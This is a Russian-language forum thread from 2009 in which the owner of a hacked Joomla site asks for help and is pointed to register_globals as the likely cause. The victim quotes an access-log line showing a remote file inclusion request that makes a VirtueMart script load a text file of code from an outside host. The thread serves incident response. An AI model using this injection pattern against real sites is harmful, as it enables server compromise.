Взломан сайт, имхо через show_image_in_imgtag.php . Что делать?

Доброго времени суток.
В джумле разбираюсь плохо, поэтому прошу помощи.


Ситуация:

Хостер сообщил, что наш сайт взломан. В логах был обнаружен следующий элемент:

64.118.90.253 - - [16/Apr/2009:07:33:59 +0400] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://corystore.com//components/b1ttletX.txt???
HTTP/1.0" 200 724 "-" "Mozilla/5.0

Ломают во второй раз. Первый раз 4 дня назад. Я установил обновления джумлы, но это, как видите, не помогло. Папка администратор паролем защищена и по факам я сделал практически все. Но хостер говорит, что это не поможет.

Что делать? Хостер требует для включения сайта устранить уязвимость. Каким образом ее устранить?

 

Globals в каком положении на хостинге?
SEF есть?

 

SEF не включали. Но если надо, можем включить.
Globals в каком положении на хостинге? - не совсем понимаю, что ты имеешь ввиду.. из факов я вычитал, что php_value register_globals 0 - могу поставить, но хостер считает, что проблемы не решит.

 

Для начала..
http://ru-mambo.ru/content/view/1110/124/
Сама методика изветсна еще минимум с 2006 года кстати
и вот - http://ru-mambo.ru/smf/index.php?PH...136d7eeeb781ec6&topic=17157.msg49044#msg49044

Так что мое подозрение на Register Globals оправдалось

З.Ы +поставьте sef от греха подальше

 

спасибо огромное. сейчас прочту